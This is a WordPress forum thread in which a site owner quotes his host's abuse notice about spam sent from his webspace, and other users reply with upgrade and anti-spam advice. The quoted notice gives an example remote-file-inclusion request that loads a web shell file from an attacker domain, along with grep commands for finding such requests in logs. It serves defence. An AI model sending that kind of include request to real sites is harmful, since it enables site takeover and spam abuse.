My web site abused for spam email

  • I have recently set up my personal web site at https://www.fmueller.com, using WordPress as a content management system. Today I received an email from my hosting company 1&1 to inform me that the site has been abused to send large amounts of spam email. Grateful for any advice how I can stop this hateful practice and secure the site against future abuse.

    Many thanks

    Frank

    PS: Below is the email I received from 1&1. I apologize for the long post.

    _________________________

    Dear Mr Frank Mueller,

    unfortunately we received a large number of complaints concerning Spam-Mails
    sent through your 1&1 Webspace.

    We have to bring to your attention that this kind of mass mailing is illegal
    and can be prosecuted.

    To help you get an general idea of the situation we divided this E-Mail into
    two thematical sections.

    In case you personally send large amounts of E-Mails, especially newsletters,
    please continue reading on section one.

    If you suspect that your Webspace has been compromised, especially through a
    script, by a third party and abused to send Spam-Mails, please continue reading
    on section two.

    *******************************************************************************
    1. E-Mail/Newsletter send by yourself?
    *******************************************************************************

    If you arrange the sending of the concerning mails by yourself, please note
    that you have to use a so called “confirmed opt-in” sytem for your newsletter
    subscriptions to ensure that E-Mails are only sent out to recipents who
    explicitly agreed to receive them.

    When using confirmed opt-in the subscription process looks something like this:
    * Somebody asks for an address to be added to the list of recipients
    * The system sends an E-Mail to that address with a verification link or code
    * Only when that (unique) link is clicked or the code mailed back the address
    is allowed to be added into the database

    You can find further information for example at:

    https://en.wikipedia.org/wiki/Opt_in_e-mail

    In case of complaints you can prove, by the verification you received, that the
    recipient explicitly agreed to be on your list.

    *******************************************************************************
    2. Webspace compromised by a third party?
    *******************************************************************************

    Quite often the Webspace gets compromised via insecure PHP-Scripts.

    Insecure PHP Scripts with security holes like Cross-site-scripting
    (https://en.wikipedia.org/wiki/Cross_site_scripting) make it possible to
    include for example Mass-Mailing-Scripts and execute them on your Webspace.
    It is very helpful to analyze the Apache log files to detect such attacks.

    The attacks are looking mostly like the following example:
    https://www.mydomain.com/index.php?page=https://www.attackerdomain.ru/c99.txt?

    Searching the log files with the pattern “=http” would be the first step:

    ‘grep “=http” access.log | less’ for the actual log file
    and
    ‘zgrep “=http” access.log.* | less’ for the older log files

    If you detect such entries, we would recommend that you analyze and modify
    the concerning script to prevent further abuse.

    In case of a third party script (for example mambo) check the relevant
    homepage for security updates and patches.

    Furthermore we recommend you to check all your third party scripts for
    security patches or updates.

    In addition a complete search of your Webspace for unknown foreign scripts
    makes sense.

    If you need more information in this case you can request a sample
    SPAM E-mail, which was sent via your Webspace, from us.

    If the SPAM problem persists we recommend a complete deletion of all your files
    on your space and a recovery of your data with a clean backup.

    We hereby ask you to take the corresponding steps required to secure your
    Webspace and to prevent the delivery of unwanted, unsolicited bulk e-mail.

    Should further complaints reach us, we’ll feel impelled to take
    corresponding steps according to our T&C which results in in a temporarily lock.
    Thank you for your understanding.

    If you got further questions, feel free to contact us.

    Kind Regards.


    1&1 Internet Inc.
    Abuse-Department

Viewing 2 replies - 1 through 2 (of 2 total)

  • Dear Frank,

    The first thing you do is upgrade you installation of WordPress to the current version.

    You are currently running 2.1.2. You might have missed the announcement in your dashboard that there is a new release out that addresses some security issues. If you did miss it, here is that thread:

    https://www.ads-software.com/development/2007/04/wordpress-213-and-2010/

    Upgrade immediately.

    Next thing to look at after that is whether or not you have any plugins installed that send emails.. contact forms, especially.

    Do you?

    How about newsletter plugins?

    If you do not, you should know that e-mail headers can be forged, quite easily, and often times are. I would be asking 1&1 if they have confirmed that the e-mails were ACTUALLY sent via your domain or did the headers just make it look like they originated from you.

    There’s a critical distinction that needs to be made:

    Can they verify the traffic from your site through their network?

    Or are they simply getting complaints from folks, and relying on the headers for evidence?

    Once you have upgraded, and if you have NOTHING on your site that might be sending out e-mails.. and if they (the e-mails) continue, chances are the headers are being forged.

    Hope that helps,

    whoomai

    (1) Don’t state your e-mail address on your website. If you are going to have somebody contact you, use a PHP form.

    (2) It is not necessary, however, that you need to designate a disposable e-mail account under Options/General. That’s because a comment spammer doesn’t use his/her own e-mail account to register an account.

    (3) Be careful with single-line comments like ‘Hi.’ and ‘Thank you.’ Comment spammers often leave those simple comments to test your blog and see your security measures.

    Good luck

    Tom Bluewater

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘My web site abused for spam email’ is closed to new replies.